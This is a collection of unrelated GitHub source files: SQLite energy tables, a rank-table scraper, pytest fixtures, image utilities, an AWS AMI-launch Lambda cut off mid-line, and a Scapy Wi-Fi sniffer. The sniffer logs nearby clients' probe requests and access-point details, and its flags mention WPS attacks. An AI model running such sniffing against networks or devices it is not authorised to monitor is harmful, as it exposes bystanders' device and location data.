#print (get_hourly_acPowerWeekend_from_db())
#############################****************** create a carChargerPowerWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS carChargerPowerWeek (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerUsed INTEGER )""")
#### Insertion Methods in the database for carChargerPowerWeek table ####
def insert_carChargerPowerWeek(): # insert what is the car charger power consumption during week days
with conn:
i = 0
for item in carChargerPowerWeek:
c.execute("INSERT OR IGNORE INTO carChargerPowerWeek VALUES (?, ?)", (i, item))
i = i + 1
#### Insert car charger power consumption during the week in database ####
insert_carChargerPowerWeek()
def get_hourly_carChargerPowerWeek_from_db(dayTime): # get hourly power consumption during week days by id / dayTime
c.execute("SELECT powerUsed FROM carChargerPowerWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM carChargerPowerWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the carChargerPowerWeek temperature at x hour of the day to int ####
def convert_to_int_get_hourly_carChargerPowerWeek_from_db(dayTime):
y = get_hourly_carChargerPowerWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_carChargerPowerWeek_from_db())
#############################****************** create a carChargerPowerWeekend table *******************###############
c.execute(""" CREATE TABLE IF NOT EXISTS carChargerPowerWeekend (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerUsed INTEGER )""")
#### Insertion Methods in the database for carChargerPowerWeekend table ####
def insert_carChargerPowerWeekend(): # insert what is the car charger power consumption during weekend days
with conn:
i = 0
for item in carChargerPowerWeekend:
c.execute("INSERT OR IGNORE INTO carChargerPowerWeekend VALUES (?, ?)", (i, item))
i = i + 1
#### Insert car charger power consumption during the weekend in database ####
insert_carChargerPowerWeekend()
def get_hourly_carChargerPowerWeekend_from_db(dayTime): # get hourly power consumption during weekend days by id / dayTime
c.execute("SELECT powerUsed FROM carChargerPowerWeekend WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM carChargerPowerWeekend") ### For debug only ####
return c.fetchone()
#### convert the value of when the carChargerPowerWeekend temperature at x hour of the day to int ####
def convert_to_int_get_hourly_carChargerPowerWeekend_from_db(dayTime):
y = get_hourly_carChargerPowerWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_carChargerPowerWeekend_from_db())
#############################****************** create a creditGeneratedWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS creditGeneratedWeek (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
credit INTEGER )""")
#### Insertion Methods in the database for creditGeneratedWeek table ####
def insert_creditGeneratedWeek(): # insert what the credit generated during week days
with conn:
i = 0
for item in creditGeneratedWeek:
c.execute("INSERT OR IGNORE INTO creditGeneratedWeek VALUES (?, ?)", (i, item))
i = i + 1
#### Insert credit generated during the weekend in database ####
insert_creditGeneratedWeek()
def get_hourly_creditGeneratedWeek_from_db(dayTime): # get hourly credit generated during week days by id / dayTime
c.execute("SELECT credit FROM creditGeneratedWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM creditGeneratedWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the creditGeneratedWeek temperature at x hour of the day to int ####
def convert_to_int_get_hourly_creditGeneratedWeek_from_db(dayTime):
y = get_hourly_creditGeneratedWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_creditGeneratedWeek_from_db())
#############################****************** create a creditGeneratedWeekend table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS creditGeneratedWeekend (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
credit INTEGER )""")
#### Insertion Methods in the database for creditGeneratedWeekend table ####
def insert_creditGeneratedWeekend(): # insert what the credit generated during weekend days
with conn:
i = 0
for item in creditGeneratedWeekend:
c.execute("INSERT OR IGNORE INTO creditGeneratedWeekend VALUES (?, ?)", (i, item))
i = i + 1
#### Insert credit generated during the weekend in database ####
insert_creditGeneratedWeekend()
def get_hourly_creditGeneratedWeekend_from_db(dayTime): # get hourly credit generated during weekend days by id / dayTime
c.execute("SELECT credit FROM creditGeneratedWeekend WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM creditGeneratedWeekend") ### For debug only ####
return c.fetchone()
#### convert the value of when the creditGeneratedWeekend temperature at x hour of the day to int ####
def convert_to_int_get_hourly_creditGeneratedWeekend_from_db(dayTime):
y = get_hourly_creditGeneratedWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_creditGeneratedWeekend_from_db())
#############################****************** create a energyToBuyWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS energyToBuyWeek (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
debit INTEGER )""")
#### Insertion Methods in the database for energyToBuyWeek table ####
def insert_energyToBuyWeek(): # insert what the debit cost during weekend days
with conn:
i = 0
for item in energyToBuyWeek:
c.execute("INSERT OR IGNORE INTO energyToBuyWeek VALUES (?, ?)", (i, item))
i = i + 1
#### Insert debit generated during the week in database ####
insert_energyToBuyWeek()
def get_hourly_energyToBuyWeek_from_db(dayTime): # get hourly debit cost during week days by id / dayTime
c.execute("SELECT debit FROM energyToBuyWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM energyToBuyWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the energyToBuyWeek at x hour of the day to int ####
def convert_to_int_get_hourly_energyToBuyWeek_from_db(dayTime):
y = get_hourly_energyToBuyWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_energyToBuyWeek_from_db())
#############################****************** create a energyToBuyWeekend table *******************###################
c.execute(""" CREATE TABLE IF NOT EXISTS energyToBuyWeekend (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
debit INTEGER )""")
#### Insertion Methods in the database for energyToBuyWeekend table ####
def insert_energyToBuyWeekend(): # insert what the credit cost during weekend days
with conn:
i = 0
for item in energyToBuyWeekend:
c.execute("INSERT OR IGNORE INTO energyToBuyWeekend VALUES (?, ?)", (i, item))
i = i + 1
#### Insert credit cost during the weekend in database ####
insert_energyToBuyWeekend()
def get_hourly_energyToBuyWeekend_from_db(dayTime): # get hourly debit cost during weekend days by id / dayTime
c.execute("SELECT debit FROM energyToBuyWeekend WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM energyToBuyWeekend") ### For debug only ####
return c.fetchone()
#### convert the value of when the energyToBuyWeekend at x hour of the day to int ####
def convert_to_int_get_hourly_energyToBuyWeekend_from_db(dayTime):
y = get_hourly_energyToBuyWeekend_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_energyToBuyWeekend_from_db())
# #############################****************** create a freeVariable table *******************#####################
#
# c.execute(""" CREATE TABLE IF NOT EXISTS freeVariable (
# id INTEGER PRIMARY KEY AUTOINCREMENT,
# val INTEGER )""")
#
# #### Insertion Methods in the database for tempPrefSimple0 table ####
# def insert_freeVariable(idn): # insert what is the preferred temperature during weekend days
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (:id, :val)", {'id': idn.id, 'val': idn.val})
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (2, numPanels))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (3, numLights))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (4, oneLightPower))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (5, outsideTemp))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (6, indoorTemp))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (7, sleepingTemp))
#
# # c.execute("INSERT INTO employee VALUES (:first, :last, :pay)",
# # {'first': emp.first, 'last': emp.last, 'pay': emp.pay})
# #### Insert preferred temperature during the weekend in database ####
# insert_freeVariable()
#
# def freeVariable_from_db(): # get hourly prefered temperature days during weekend days by id / idn
# #c.execute("SELECT val FROM freeVariable WHERE val=?", (idn,))
# c.execute("SELECT * FROM freeVariable") ### For debug only ####
# return c.fetchone()
# print(freeVariable_from_db())
#
# #### convert the value of when the freeVariable temperature at x hour of the day to int ####
# def convert_to_int_freeVariable_from_db(idn):
# y = freeVariable_from_db(idn)
# z = y[0]
# return z
# #print (get_hourly_freeVariable_from_db())
#conn.close() # close database
| [
"noreply@github.com"
] | noreply@github.com |
6e1387d82d992492af8d31aff4beea24595cbe8d | e7ae11013d03df592a142f225df345df70451d33 | /update/parser_zasa.py | 39a9d4f857d79d07485f826623b39224fabec6be | [
"MIT"
] | permissive | kuna/iidxranktable | 7028bef5ca410b207e18b45a5ba3f2f6e5d51739 | 7182baaf25b76a8f696e96947d85d4b1d074ba4a | refs/heads/master | 2021-09-15T01:11:03.931539 | 2021-08-04T10:21:26 | 2021-08-04T10:21:26 | 32,804,915 | 8 | 0 | null | 2016-02-12T16:49:49 | 2015-03-24T14:47:43 | Python | UTF-8 | Python | false | false | 1,544 | py | #-*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import urllib
import re
def getGroup(arr, g):
for ele in arr:
if (ele[0] == g):
return ele
# if not, add group
new_group = (g, [])
arr.append( new_group )
return new_group
#
# ==================================================================
#
def parse6():
return parse("6")
def parse7():
return parse("7")
def parse8():
return parse("8")
def parse9():
return parse("9")
def parse10():
return parse("10")
def parse11():
return parse("11")
def parse12():
return parse("12")
def parse(diff):
# common
# http://stackoverflow.com/questions/17509607/submitting-to-a-web-form-using-python
formdata = {
'env': 'a230',
'submit': '%E8%A1%A8%E7%A4%BA',#u'表示',
'cat': 0,
'mode': 'p1',
'offi': diff,
}
formdata_raw = urllib.urlencode(formdata)
req = urllib.Request("http://zasa.sakura.ne.jp/dp/rank.php", formdata_raw)
data = urllib.request.urlopen(req).read()
soup = BeautifulSoup(data, "lxml") # depress warning - parser 'lxml'
res = [] # [(group, [song name, ..]), ..]
table = soup.find('table', class_="rank_p1")
trs = table.find_all('tr')
group_title = ''
for tr in trs[1:-1]:
# first col: diff group
group_title = tr.find_all('td')[0].get_text()
spns = tr.find_all('span')
for sp in spns:
sp_text = sp.get_text()
title = sp_text[:-4]
diff = "DP" + sp['class'][0].upper()
if (diff == "DPL"):
diff = "DPA"
title += " (L)"
group = getGroup(res, group_title)
group[1].append( (title, diff) )
return res
| [
"kgdgwn98@gmail.com"
] | kgdgwn98@gmail.com |
efd792efcef452aa13a12e22f971062fd6a4fc81 | 5bba21208673ad4a43ae84bde1ac861b8b857a7e | /conftest.py | f31019dcb2c13e0c9ce272ab9cbd4894e2862358 | [] | no_license | gongzuo666/teach | d9c79a889c77663a1594bd148ead7532a26bd31c | 5ce6839cbe69e8094338de9110885faf28c49cbb | refs/heads/master | 2023-01-06T21:09:01.064643 | 2020-11-03T08:17:26 | 2020-11-03T08:17:27 | 309,554,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : conftest.py
# Author: tian guang yuan
# Time : 2020/6/21 21:54
import pytest
import json
from Lib.ApiLogin import LoginClass
from Lib.ApiLesson import LessonClass
@pytest.fixture(scope='module', autouse=True) # 环境初始化,数据清除
def delete_all_lesson(request):
print('-------------------开始-------------------')
# 1、登录
session = LoginClass().login('{"username": "auto","password": "sdfsdfsdf"}')
# 2、列出所有课程
inData = {'action': 'list_course',
'pagenum': 1,
'pagesize': '20'
}
resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']
while resList != []:
for one in resList:
lessonId = one['id'] # 获取课程id
# 3、删除所有的课程
LessonClass().delete_all_lesson(session, lessonId)
resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']
print('---------------------结束-------------------')
# # 增加课程测试数据
# for one in range(1,15):
# lessonData = {"name":f"田园{one:0>3}","desc":"初中化学课程","display_idx":f"{one}"}
# LessonClass().add_lesson(session,lessonData)
# 环境 数据清除-----teardown
def fin():
print('-----------测试数据恢复-------------')
inData = {'action': 'list_course',
'pagenum': 1,
'pagesize': '20'
}
resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']
while resList != []:
for one in resList:
lessonId = one['id'] # 获取课程id
# 3、删除所有的课程
LessonClass().delete_all_lesson(session, lessonId)
resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']
request.addfinalizer(fin)
| [
"15100978670@163.com"
] | 15100978670@163.com |
2606c17e45322b2f7607fa4df41b209d3ef5fb13 | fb1964b66da85ed65bd7ed348e127bbf4cbaf6d0 | /myCal2/bigCal.py | a17b6236c3b3542f4debae3b83a675c595d05734 | [] | no_license | iimseunghyun/mypython | 2ee157cd3bc5eeae224326660d59c42c400632b2 | 432677a3d24ffd8f4f145c077b0782440e4e8bf4 | refs/heads/master | 2021-03-25T17:45:33.573778 | 2020-03-16T07:25:52 | 2020-03-16T07:25:52 | 247,636,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 936 | py | class BigNum:
digit =[
"000000...00...00...000000",
"....1....1....1....1....1",
"22222....2222222....22222",
"33333....333333....333333",
"4...44...444444....4....4",
"555555....55555....555555",
"666666....666666...666666",
"77777....7....7....7....7",
"888888...8888888...888888",
"999999...999999....999999",
".......#...###...#.......", #10
"...........###...........", #11
"......#.#...#...#.#......", #12
"........#...#...#........" #13
]
myBigNum = ""
def __init__(self, num):
self.num = num
def mkBigNum(self):
for x in range(5):
n=[]
for y in range(5):
n.append(self.digit[self.num][x*5+y])
print ("%s%s%s%s%s" %(n[0],n[1],n[2],n[3],n[4]))
if __name__ == "__main__":
bn1 = BigNum(13)
bn1.mkBigNum() | [
"lms-426@hanmail.net"
] | lms-426@hanmail.net |
ba56c4441471b121cb245b3dc7df10afed2be875 | c8fb08b75c19d16719c31a5f6aa368372f8d410c | /rotate.py | ea231ad9b865b54baa56c40b8d4ad573f027bb9f | [] | no_license | leohfigueiredo/Image_proc_init | 7efbfefddf37e8673249f6b5355f170f50b31fa7 | f79ce5ae9a284d74775fca5f67267fb79bff3d9f | refs/heads/master | 2022-12-09T14:10:57.682981 | 2020-09-07T23:07:26 | 2020-09-07T23:07:26 | 293,649,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | import cv2
import matplotlib.pyplot as plt
# read the image in grayscale
img = cv2.imread("Lenna.png", 0)
rows, cols = img.shape
# rotate for 45 degree counter-clockwise respect to the center of the image
M = cv2.getRotationMatrix2D((cols/2, rows/2), 45, 1)
dst = cv2.warpAffine(img, M, (cols, rows))
# display image
plt.figure()
plt.imshow(dst, cmap="gray")
plt.show()
| [
"leohfigueiredo@gmail.com"
] | leohfigueiredo@gmail.com |
369d942517debc6f30b559509854cb06ba1ef9e5 | 27d0ea837489f68978287e369b60faa57eeb2497 | /examples/wifiz.py | 9044f15d865520323e139912c9568d0c8210365d | [] | no_license | nimdavtanke/wifi-scripts | 9692a4c67d23cc1a7d076d6a41be2bdd6cf4d3ce | 83576bcbf62cdfe020b5c2178f9ab177733de1dc | refs/heads/master | 2016-08-06T15:20:47.206467 | 2015-03-28T08:37:16 | 2015-03-28T08:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,227 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# 802.11 sniffer/wpsig/wpspin/reaver
# Credits go to:
#
# Craig Heffner Tactical Network Solutions
# https://github.com/devttys0/wps
#
# WPSIG [ablanco@coresecurity.com, oss@coresecurity.com]
__author__ = '090h'
__license__ = 'GPL'
from sys import argv, exit
from os import path, geteuid
# import logging
# logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# from scapy.all import conf
# conf.verb = 1
# conf.use_pcap = True
# conf.use_dnet = False
from scapy.layers.dot11 import *
from scapy.all import *
# impacket
try:
from impacket import dot11
from impacket.dot11 import Dot11
from impacket.dot11 import Dot11Types
from impacket.dot11 import Dot11ManagementFrame
from impacket.dot11 import Dot11ManagementProbeRequest
from impacket.ImpactDecoder import RadioTapDecoder
except ImportError:
Exception("impacket")
from pprint import pprint
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
if LINUX:
# print('Linux detected. Trying to import PyLorcon2...')
try:
import PyLorcon2
except ImportError:
logging.warning('PyLorcon2 import failed. Injection is not available.')
if WINDOWS:
logging.error('Sorry, no Windows.')
exit(-1)
if DARWIN:
logging.warning('OS X detected. Only pasive mode will be available')
#TODO: add iOS and Android detection
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
class WiFiWizard(object):
def __init__(self, iface, output=None, whitelist=None, verbose=False):
# Replace this with your phone's MAC address
if not whitelist: whitelist = ['00:00:00:00:00:00', ]
self.iface = iface
self.whitelist = whitelist
self.verbose = verbose
self.aps = {}
self.clients = {}
# Probe requests from clients
def handle_probe(self, pkt):
if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info:
essid = pkt[Dot11ProbeReq].info
else:
essid = 'Hidden SSID'
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
#TODO: add logging
return
# New client
if client not in self.clients:
self.clients[client] = []
print('[!] New client: %s ' % client)
if essid not in self.clients[client]:
self.clients[client].append(essid)
print('[+] New ProbeRequest: from %s to %s' % (client, essid))
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
# Check to see if it's a hidden SSID
essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist:
#TODO: add logging
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
try:
extra = pkt.notdecoded
rssi = -(256-ord(extra[-4:-3]))
except:
rssi = -100
p = pkt[Dot11Elt]
capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
# print('capability = %s' % capability)
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = '/'.join(crypto)
if bssid not in self.aps:
self.aps[bssid] = (channel, essid, bssid, enc, rssi)
print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi)
def pkt_handler(self, pkt):
# wlan.fc.type == 0 Management frames
# wlan.fc.type == 1 Control frames
# wlan.fc.type == 2 Data frames
# wlan.fc.type_subtype == 0 Association request
# wlan.fc.type_subtype == 1 Association response
# wlan.fc.type_subtype == 2 Reassociation request
# wlan.fc.type_subtype == 3 Reassociation response
# wlan.fc.type_subtype == 4 Probe request
# wlan.fc.type_subtype == 5 Probe response
# wlan.fc.type_subtype == 8 Beacon
try:
print('-->', pkt.name)
except:
pass
#Beacon
if pkt.haslayer(Dot11Beacon):
self.handle_beacon(pkt)
# Client ProbeReq
if pkt.haslayer(Dot11ProbeReq):
self.handle_request(pkt)
# if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
if pkt.haslayer(Dot11ProbeResp):
self.handle_response(pkt)
def sniff(self):
'''
Sniff Beacon and Probe Requst/Response frames to extract AP info
:param count: packets to capture, 0 = loop
:return:
'''
print('Press Ctrl-C to stop sniffing.')
sniff(iface=self.iface,
prn=self.pkt_handler,
lfilter=lambda p: p.haslayer(Dot11))
if __name__ == '__main__':
parser = ArgumentParser(description='WiFi PWN T00L', formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
parser.add_argument('interface', help='802.11 interface to use')
parser.add_argument('-c', '--channel', required=False)
parser.add_argument('-w', '--wps', required=False, action='store_true', help='wps hack')
parser.add_argument('-a', '--active', required=False, action='store_true', help='active mode')
args = parser.parse_args()
if geteuid() != 0:
exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'.")
WiFiWizard(args.interface).sniff()
| [
"oleg.kupreev@gmail.com"
] | oleg.kupreev@gmail.com |
cc339d3a4c500a7f726c3be25016416989effdf5 | 8186368ed5062106a1dca6677b6542ce67e890a9 | /util/get_similar_fromid.py | 087a9797fbff07cd36632e847ed600cc3fcedcee | [] | no_license | sunyuzhao/group_profiles | 993d28cf9cd8867d10f6eb4d19f5c41459c768a5 | c2773551b35c618ad6adbeb1b83ab4c2e57b52ec | refs/heads/master | 2020-04-26T02:19:06.163166 | 2018-04-11T06:33:46 | 2018-04-11T06:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # -*- coding: utf-8 -*-
import sys
import requests
from urllib2 import urlopen
from urllib import urlencode
import json
reload(sys)
sys.setdefaultencoding("utf-8")
KEY_TO_FROM_ID = 'http://dataplatform.yidian.com:8083/api/other/channel_query/query_all'
FROM_ID_SIMILAR = 'http://10.111.0.129:3303/info'
def get_fromid_from_keyword(keyword):
(fromid, name) = requests.post(KEY_TO_FROM_ID, data={
'word': keyword
}).text.split(',')[0].split('-')
return fromid, name
def get_similar_from_id(from_id):
query = {
'method': 'cbow',
'interest': 'fromid:%s' % from_id
}
json_result = json.loads(urlopen('%s?%s' % (FROM_ID_SIMILAR, urlencode(query))).read())
if json_result['status'] == 'success':
for item in json_result['result']:
print '%s\t%f' % (item['name'], item['value'])
if __name__ == '__main__':
keyword = sys.argv[1]
from_id, name = get_fromid_from_keyword(keyword)
print 'from_id=%s 频道名=%s' % (from_id, name)
print '----------------------------------'
get_similar_from_id(from_id)
| [
"js982986555@live.com"
] | js982986555@live.com |
051ee8415a1c0bdf5dcf6ba43751abb4505e5215 | 53f415d67dd3304c16d8a3e51d34a2ea02249bc7 | /NIPS Topic Model.py | 50b0b09b8bd4f5d4684fe972a2bfc165621286d9 | [
"MIT"
] | permissive | munsheet/EM | c6b599c4b6dc5c9fc039e3b79aca272cd08ec76c | 921752f79e78a4cb6f9e51166d992a7b14af0366 | refs/heads/master | 2021-01-19T09:13:18.120286 | 2017-04-09T20:47:58 | 2017-04-09T20:47:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py | # import libs
import numpy as np
import matplotlib.pyplot as plt
import sys
from math import log
# read data
file = open('data/docword.nips.txt', 'r')
data = [int(datum) for datum in file.read().split()]
D = data[0]
W = data[1]
NNZ = data[2]
data = data[3:]
# store data as numpy matrix
x = np.zeros((D, W))
for i in range(0, NNZ, 3):
x[data[i]-1, data[i+1] - 1] = data[i+2]
J = 30 # number of topics/ clusters
# p corresponds to probability of word in a topic
p = np.ones((J, W))
p = 1.0/W * p
# pi corresponds to probability that document belongs to topic
pi = np.ones(J)
pi = 1.0/J * pi
# function to get w_i,j
def w(i, j):
numerator = 1.0
denominator = 1.0
for l in range(J):
for k in range(W):
temp = p[l,k]**x[i,k]
if l == j:
numerator *= temp
denominator *= temp
denominator *= pi[l]
return (numerator * pi[j])/ denominator
# E-Step computation
def expectation():
Q = 0.0
for i in range(D):
print("expectation round", i)
for j in range(J):
Q += (log(pi[j]) + np.dot(x[i,], np.log(p[j,]))) * w(i,j)
return Q
# M-Step
def max_p(j):
numer = 0
denom = 0
for i in range(D):
w_ij = w(i,j)
numer += x[i,] * w_ij
denom += np.sum(x[i,]) * w_ij
return numer/denom
def max_pi(j):
pi_j = 0
for i in range(D):
pi_j += w(i,j)
return pi_j/ D
# EM
prev_expectation = sys.maxsize
t = 0
while True:
e = expectation()
if abs(e - prev_expectation) < 100:
break
prev_expectation = e
for j in range(J):
p[j,] = max_p(j)
pi[j] = max_pi(j)
print(t, e)
t += 1
| [
"zpahuja2@illinois.edu"
] | zpahuja2@illinois.edu |
f4b5de28e17ca2e76abd4ecf8563070ac8f934bc | 77a5d39b108d07bf0a1516fa8b3fdee71b4e5bb7 | /utils.py | 767aae0096d20c47ac2828d81d7ad855ff773ec1 | [] | no_license | babypure/One-shot-Image-to-Image-Translation | 94ac810c4d2e0384da5d99055cfa4f1f878abbf0 | d23bcd2db77d415ba34c9c01a0a6fd25f8721023 | refs/heads/master | 2022-01-16T00:22:33.797739 | 2019-07-22T09:05:21 | 2019-07-22T09:05:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import tensorflow as tf
from tensorflow.contrib import slim
from scipy import misc
import os, random
import os
import numpy as np
class ImageData:
# define input data info
def __init__(self, img_h=256, img_w=256, channels=3, augment_flag=False, if_style=False):
self.img_h = img_h
self.img_w = img_w
self.channels = channels
self.augment_flag = augment_flag
self.if_style = if_style
# read image file from file path
def image_processing(self, filename):
# print(str(filename))
x = tf.read_file(filename)
x_decode = tf.image.decode_jpeg(x, channels=self.channels)
img = tf.image.resize_images(x_decode, [self.img_h, self.img_w])
# shift value to -1 ~ 1
img = tf.cast(img, tf.float32)/127.5-1
if(self.augment_flag):
augment_size_h = self.img_h + (30 if self.img_h == 256 else 15)
augment_size_w = self.img_w + (30 if self.img_w == 256 else 15)
p = random.random()
if(p>0.2):
# random crop and flip
if(self.if_style):
img = self.augmentation(img, augment_size_h+100, augment_size_w+100)
else:
img = self.augmentation(img, augment_size_h, augment_size_w)
return img
def augmentation(self, image, aug_img_h, aug_img_w):
seed = random.randint(0, 2 ** 31 - 1)
ori_image_shape = tf.shape(image)
image = tf.image.random_flip_left_right(image, seed=seed)
image = tf.image.resize_images(image, [aug_img_h, aug_img_w])
image = tf.random_crop(image, ori_image_shape, seed=seed)
return image
def load_test_data(image_path, size_h=256, size_w=256):
img = misc.imread(image_path, mode='RGB')
img = misc.imresize(img, [size_h, size_w])
img = np.expand_dims(img, axis=0)
img = img/127.5 - 1 # -1 ~ 1
return img
def save_images(images, batch_size, image_path):
images = (images+1.)/2 # 0 ~ 1
h, w = images.shape[1], images.shape[2]
img = np.zeros((h*batch_size, w, 3))
for idx, image in enumerate(images):
img[h*idx:h*(idx+1), 0:w, :] = image
return misc.imsave(image_path, img)
def show_all_variables():
model_vars = tf.trainable_variables()
slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def check_folder(log_dir):
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
| [
"a0928249471@gmail.com"
] | a0928249471@gmail.com |
a53d180b2d0604cbcd6624d4c8f734141673ae1d | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/fd662cf898124b46b21e2ca30d117042.py | 6281c95b5842337f10d96aec50200b80c8cd2e1d | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 346 | py | def hey(input):
has_alpha = False
has_num = False
for i in input:
if i.isalpha():
has_alpha = True
elif i.isnumeric():
has_num = True
if not has_alpha and not has_num:
return "Fine. Be that way!"
if input.upper() == input and has_alpha:
return "Whoa, chill out!"
if input[-1] == "?":
return "Sure."
return "Whatever."
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
4b8f9da92a1bc4cbf9f59d86ffaba208a6c9a530 | 72b57850bf0ef7480a9a5dfc38e428371631a00d | /amilaunch/amilaunch.py | c5b6dbe8c69b950521d8216dd0a31a9645fce4c2 | [
"Apache-2.0"
] | permissive | 4n6ir/matchmeta | e92ceb005c928708273d3d8d9d538b8a44f110e5 | 6ec4f5094e359f7861e828eab17953704cc4a6e8 | refs/heads/main | 2023-03-18T15:51:55.266987 | 2023-03-13T01:54:49 | 2023-03-13T01:54:49 | 325,153,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,063 | py | import boto3
import json
import logging
import os
import uuid
from boto3.dynamodb.conditions import Key
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
cfn_client = boto3.client('cloudformation')
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(os.environ['DYNAMODB_TABLE'])
parameter = boto3.client('ssm')
ami_response = parameter.get_parameter(
Name = os.environ['AMI_ID']
)
ami_value = ami_response['Parameter']['Value']
type_response = parameter.get_parameter(
Name = os.environ['INSTANCE_TYPE']
)
type_value = type_response['Parameter']['Value']
deploy_response = parameter.get_parameter(
Name = os.environ['DEPLOY_ARN']
)
deploy_value = deploy_response['Parameter']['Value']
if ami_value == os.environ['VALIDTEST']:
response = table.query(
KeyConditionExpression = Key('pk').eq('AMAZON#')
)
responsedata = response['Items']
while 'LastEvaluatedKey' in response:
response = table.query(
KeyConditionExpression = Key('pk').eq('AMAZON#'),
ExclusiveStartKey = response['LastEvaluatedKey']
)
responsedata.update(response['Items'])
for item in responsedata:
if item['running'] == 'ON':
if item['architecture'] == 'x86_64':
ec2type = 't3a.small'
archtype = 'x86_64'
elif item['architecture'] == 'arm64':
ec2type = 't4g.small'
archtype = 'aarch64'
response = parameter.put_parameter(
Name = os.environ['AMI_ID'],
Description = 'AMI Pipeline Image Id',
Value = item['imageid'],
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['INSTANCE_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = ec2type,
Overwrite = True
)
response = parameter.put_parameter(
Name = os.environ['ARCH_TYPE'],
Description = 'AMI Pipeline Instance Type',
Value = archtype,
Overwrite = True
)
uid = uuid.uuid1()
response = cfn_client.create_stack(
StackName = 'runmeta-'+str(uid),
TemplateURL = os.environ['TEMPLATE'],
Capabilities = ['CAPABILITY_IAM'],
RoleARN = deploy_value
)
response = parameter.put_parameter(
Name = os.environ['STACK_NAME'],
Value = 'runmeta-'+str(uid),
Type = 'String',
Overwrite = True
)
break
else:
stack_response = parameter.get_parameter(
